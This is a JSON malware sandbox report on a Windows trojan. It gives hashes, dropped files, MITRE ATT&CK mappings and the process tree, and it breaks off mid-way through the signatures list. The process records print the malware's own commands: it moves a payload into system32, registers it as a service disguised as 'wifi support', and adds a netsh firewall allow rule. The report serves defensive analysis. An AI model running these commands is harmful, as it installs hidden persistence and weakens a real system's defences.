{"size": 13393408, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe", "sha256": "6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe", "av_detect": 88, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 5, "total_processes": 9, "total_signatures": 239, "extracted_files": [{"name": "mdzgxwae.exe", "file_path": "%TEMP%\\mdzgxwae.exe", "file_size": 5242368, "sha256": "e359a280334056f6898ed4752b8204a7ff30b88b70f4ed84ba5011578d6a189a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe (PID: 5184)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MDZGXWAE.EXE.67B73C1B.bin", "file_size": 14466560, "sha256": "5e99da766bb0ca1d83a981fd010b60a2288d6798a8f125720df9643bcf106a63", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "mdzgxwae.exe.67B73C1A.bin", "file_size": 14466560, "sha256": "5e99da766bb0ca1d83a981fd010b60a2288d6798a8f125720df9643bcf106a63", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00005184", "name": "6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe", "normalized_path": "C:\\6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe", "sha256": "6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe"}, {"uid": "00000000-00005476", "parentuid": "00000000-00005184", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\cygqxrtx\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005412", "parentuid": "00000000-00005184", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\mdzgxwae.exe\" %WINDIR%\\system32\\cygqxrtx\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005352", "parentuid": "00000000-00005184", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create cygqxrtx binPath= \"%WINDIR%\\system32\\cygqxrtx\\mdzgxwae.exe /d\\\"C:\\6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005780", "parentuid": "00000000-00005184", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description cygqxrtx \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005912", "parentuid": "00000000-00005184", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start cygqxrtx", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005856", "parentuid": "00000000-00005184", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00006096", "name": "mdzgxwae.exe", "normalized_path": "%WINDIR%\\system32\\cygqxrtx\\mdzgxwae.exe", "command_line": "/d\"C:\\6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\"", "sha256": "5e99da766bb0ca1d83a981fd010b60a2288d6798a8f125720df9643bcf106a63"}, {"uid": "00000000-00005700", "parentuid": "00000000-00006096", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 7, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 6, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" writes to a file 